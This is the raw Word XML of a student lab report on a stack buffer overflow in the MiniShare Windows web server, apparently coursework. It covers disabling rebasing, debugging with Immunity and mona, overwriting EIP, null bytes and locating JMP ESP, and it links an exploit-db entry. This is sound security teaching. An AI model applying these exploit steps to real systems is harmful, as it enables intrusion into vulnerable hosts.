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3F6B92" w14:textId="20B682F9" w:rsidR="00FC2E29" w:rsidRDefault="00FC2E29" w:rsidP="00FC2E29">
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Week</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lab </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6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Minishare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> for Win</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>CIS 450</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>Krutarth Panchal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="470E87BF" w14:textId="79E2AE09" w:rsidR="00FC2E29" w:rsidRDefault="00FC2E29" w:rsidP="00FC2E29">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF3747">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Section 1</w:t>
      </w:r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Minishare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Immunity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA3AB28" w14:textId="4754A89B" w:rsidR="00EB4569" w:rsidRPr="00EB4569" w:rsidRDefault="00EB4569" w:rsidP="00EB4569"/>
    <w:p w14:paraId="24DD7072" w14:textId="63457B84" w:rsidR="00FC2E29" w:rsidRDefault="00FC2E29" w:rsidP="00FC2E29">
      <w:r>
        <w:t>1. What registry key turns off rebasing on Windows 7?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C5DA4A" w14:textId="629397E6" w:rsidR="00E60626" w:rsidRDefault="00E60626" w:rsidP="00FC2E29">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53373529" wp14:editId="78E54E1A">
            <wp:extent cx="5756632" cy="3714750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1138209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2093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1659" cy="371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DF515" w14:textId="77777777" w:rsidR="00A4497A" w:rsidRDefault="00A4497A" w:rsidP="00A4497A">
      <w:pPr>
        <w:ind w:left="79"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[HKEY_LOCAL_MACHINE\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\Control\Session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-130"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Manager\Memory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Management]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC7FC08" w14:textId="1B1F11B4" w:rsidR="00A4497A" w:rsidRPr="00A4497A" w:rsidRDefault="00A4497A" w:rsidP="00A4497A">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="79"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MoveImages</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"=dword:00000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53088DBB" w14:textId="1D41B070" w:rsidR="00FC2E29" w:rsidRDefault="00FC2E29" w:rsidP="00FC2E29">
      <w:r>
        <w:t xml:space="preserve">2. What is the default install location for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Minishare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1F6AEE" w14:textId="7C55DCB6" w:rsidR="00A4497A" w:rsidRDefault="00A4497A" w:rsidP="00FC2E29">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>“C:\Program</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-12"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>Files\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>Minishare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F15BD84" w14:textId="3D76E80A" w:rsidR="00FC2E29" w:rsidRDefault="00FC2E29" w:rsidP="00FC2E29">
      <w:r>
        <w:t xml:space="preserve">3. What are the two ways to import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MiniShare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> into the Immunity Debugger program?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F751493" w14:textId="77777777" w:rsidR="00A4497A" w:rsidRPr="00A4497A" w:rsidRDefault="00A4497A" w:rsidP="00A4497A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A4497A">
        <w:t>From the Immunity Debugger File\Open menu option.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A321F3" w14:textId="77777777" w:rsidR="00A4497A" w:rsidRPr="00A4497A" w:rsidRDefault="00A4497A" w:rsidP="00A4497A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A4497A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">From the Immunity Debugger File\Attach menu option if the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A4497A">
        <w:t>MiniShare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A4497A">
        <w:t xml:space="preserve"> application is currently running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E94135" w14:textId="77777777" w:rsidR="00A4497A" w:rsidRDefault="00A4497A" w:rsidP="00FC2E29"/>
    <w:p w14:paraId="34C4E9E8" w14:textId="20426BFB" w:rsidR="00FC2E29" w:rsidRDefault="00FC2E29" w:rsidP="00FC2E29">
      <w:r>
        <w:t>4. What are the four windows panes in the Immunity Debugger main windows?</w:t>
      </w:r>
      <w:r w:rsidR="00A4497A">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00A4497A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F3D26BE" wp14:editId="30255A9C">
            <wp:extent cx="5943600" cy="3192145"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="586027532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027532" name="Picture 1" descr="A computer screen shot of a black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497A">
        <w:br/>
        <w:t>Top left is CPU instructions Top right is Register information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AEF439" w14:textId="2549D08C" w:rsidR="00A4497A" w:rsidRDefault="00A4497A" w:rsidP="00FC2E29">
      <w:r>
        <w:t xml:space="preserve">Lower left is Memory dump and Tower right is Stack </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>dump</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0ED7A11A" w14:textId="77777777" w:rsidR="00ED2BEA" w:rsidRDefault="00ED2BEA" w:rsidP="00FC2E29"/>
    <w:p w14:paraId="622ACB4A" w14:textId="77777777" w:rsidR="00ED2BEA" w:rsidRDefault="00ED2BEA" w:rsidP="00FC2E29"/>
    <w:p w14:paraId="21DBFEDF" w14:textId="77777777" w:rsidR="00ED2BEA" w:rsidRDefault="00ED2BEA" w:rsidP="00FC2E29"/>
    <w:p w14:paraId="5607DBE8" w14:textId="77777777" w:rsidR="00ED2BEA" w:rsidRDefault="00ED2BEA" w:rsidP="00FC2E29"/>
    <w:p w14:paraId="4EA56227" w14:textId="77777777" w:rsidR="00ED2BEA" w:rsidRDefault="00ED2BEA" w:rsidP="00FC2E29"/>
    <w:p w14:paraId="2E3E3CFD" w14:textId="77777777" w:rsidR="00ED2BEA" w:rsidRDefault="00ED2BEA" w:rsidP="00FC2E29"/>
    <w:p w14:paraId="05BF0396" w14:textId="77777777" w:rsidR="00ED2BEA" w:rsidRDefault="00ED2BEA" w:rsidP="00FC2E29"/>
    <w:p w14:paraId="5FE0852E" w14:textId="77777777" w:rsidR="00ED2BEA" w:rsidRDefault="00ED2BEA" w:rsidP="00FC2E29"/>
    <w:p w14:paraId="5E4AA2DD" w14:textId="77777777" w:rsidR="00ED2BEA" w:rsidRPr="00FC2E29" w:rsidRDefault="00ED2BEA" w:rsidP="00FC2E29"/>
    <w:p w14:paraId="2324CF19" w14:textId="0734FB34" w:rsidR="00FC2E29" w:rsidRDefault="00FC2E29" w:rsidP="00FC2E29">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF3747">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Section </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Proof of concept code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7F4878" w14:textId="73B2DBB9" w:rsidR="00881B75" w:rsidRPr="000B202E" w:rsidRDefault="00881B75" w:rsidP="000B202E"/>
    <w:p w14:paraId="47C556B2" w14:textId="2B9274EE" w:rsidR="00FC2E29" w:rsidRDefault="00FC2E29" w:rsidP="00FC2E29">
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Where can you find the vulnerability for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Minishare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DD7CCC" w14:textId="73F8B928" w:rsidR="00ED2BEA" w:rsidRDefault="00ED2BEA" w:rsidP="00FC2E29">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27E418FC" wp14:editId="41C55915">
            <wp:extent cx="5314950" cy="3560903"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="9028520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85203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9560" cy="356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38C19" w14:textId="1EE6E815" w:rsidR="00A4497A" w:rsidRDefault="00A4497A" w:rsidP="00FC2E29">
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="003134D4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/exploits/636</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4CC99C9F" w14:textId="1538B766" w:rsidR="00A4497A" w:rsidRDefault="00A4497A" w:rsidP="00FC2E29">
      <w:r>
        <w:t xml:space="preserve">you can find the code </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>there</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="789BC4A6" w14:textId="245C7EFB" w:rsidR="00FC2E29" w:rsidRDefault="00FC2E29" w:rsidP="00FC2E29">
      <w:r>
        <w:t>2. What i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">s the HTTP string needed to reproduce the buffer overflow against </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Minishare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA715F8" w14:textId="5B7664EE" w:rsidR="00A4497A" w:rsidRDefault="00A4497A" w:rsidP="00FC2E29">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="680AD2AE" wp14:editId="6AF67560">
            <wp:extent cx="5943600" cy="1751965"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1123883182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83182" name="Picture 1" descr="A computer code with tex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231D0" w14:textId="7CF72216" w:rsidR="00A4497A" w:rsidRDefault="00A4497A" w:rsidP="00FC2E29">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On the line: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A4497A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>write(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A4497A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>x, “ HTTP/1.1\r\n\r\n”,13);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABD446E" w14:textId="77777777" w:rsidR="00D749E5" w:rsidRDefault="00D749E5" w:rsidP="00FC2E29"/>
    <w:p w14:paraId="2B69E825" w14:textId="77777777" w:rsidR="00D749E5" w:rsidRDefault="00FC2E29" w:rsidP="00FC2E29">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3. What </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">information is needed in the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>proof of concept</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> code?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD41A48" w14:textId="49F732EF" w:rsidR="00FC2E29" w:rsidRDefault="00A4497A" w:rsidP="00FC2E29">
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26E11073" wp14:editId="13428A38">
            <wp:extent cx="5095875" cy="3674169"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="107849949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499496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6157" cy="36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31941" w14:textId="1F701A68" w:rsidR="00A4497A" w:rsidRDefault="00A4497A" w:rsidP="00FC2E29">
      <w:r>
        <w:t xml:space="preserve">The code needs to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> re written for the Python scripting for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1366AF45" w14:textId="77777777" w:rsidR="00D749E5" w:rsidRDefault="00D749E5" w:rsidP="00FC2E29"/>
    <w:p w14:paraId="0D030436" w14:textId="4101D93F" w:rsidR="00FC2E29" w:rsidRDefault="00FC2E29" w:rsidP="00FC2E29">
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t>How many A’s are needed to overwrite EIP</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A7BF9F" w14:textId="07DADD54" w:rsidR="00D749E5" w:rsidRDefault="00D749E5" w:rsidP="00FC2E29">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7269995C" wp14:editId="582D40F4">
            <wp:extent cx="3971925" cy="2009775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="10351327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13270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67C09" w14:textId="0B9DC3EF" w:rsidR="00D749E5" w:rsidRPr="00FC2E29" w:rsidRDefault="00D749E5" w:rsidP="00FC2E29">
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>roof-of-concept</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>code was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>successful</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>in triggering an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>violation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="23"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>in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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>MiniShare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="23"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>progra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="23"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="23"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="22"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>contains</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>many</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>letter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="14"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>As</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5629A448" w14:textId="19C56A72" w:rsidR="00FC2E29" w:rsidRDefault="00FC2E29" w:rsidP="00FC2E29">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF3747">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Section </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Finding JMP ESP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5A2251" w14:textId="5D7F8474" w:rsidR="00FC2E29" w:rsidRDefault="00FC2E29" w:rsidP="00FC2E29">
      <w:r>
        <w:t xml:space="preserve">1. What </w:t>
      </w:r>
      <w:r>
        <w:t>commands will show you the loaded executable modules</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B384F3" w14:textId="5B5F406F" w:rsidR="00D749E5" w:rsidRDefault="00D749E5" w:rsidP="00FC2E29">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7037BE1C" wp14:editId="25852592">
            <wp:extent cx="3600450" cy="1438275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="16995716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57167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1BD1E" w14:textId="2CAE5392" w:rsidR="00D749E5" w:rsidRDefault="00D749E5" w:rsidP="00FC2E29">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>!mona</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="1"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE36905" w14:textId="14AD5DE7" w:rsidR="00FC2E29" w:rsidRDefault="00FC2E29" w:rsidP="00FC2E29">
      <w:r>
        <w:t>2. Wha</w:t>
      </w:r>
      <w:r>
        <w:t>t character should we avoid since it is considered a string in C programming</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6D5869" w14:textId="3BAC3CFF" w:rsidR="00D749E5" w:rsidRDefault="00D749E5" w:rsidP="00D749E5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="24"/>
        <w:ind w:left="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>“\x00”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590E74EC" w14:textId="77777777" w:rsidR="00D749E5" w:rsidRPr="00D749E5" w:rsidRDefault="00D749E5" w:rsidP="00D749E5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="24"/>
        <w:ind w:left="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B3E52F9" w14:textId="546FACA3" w:rsidR="00174691" w:rsidRDefault="00FC2E29" w:rsidP="00FC2E29">
      <w:r>
        <w:t xml:space="preserve">3. What </w:t>
      </w:r>
      <w:r>
        <w:t>command can you run to show the JMP</w:t>
      </w:r>
      <w:r w:rsidR="00174691">
        <w:t xml:space="preserve"> ESP memory address in kernal32.dll</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="00D749E5">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D749E5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B3ED3C3" wp14:editId="144EC4EC">
            <wp:extent cx="3209925" cy="533400"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
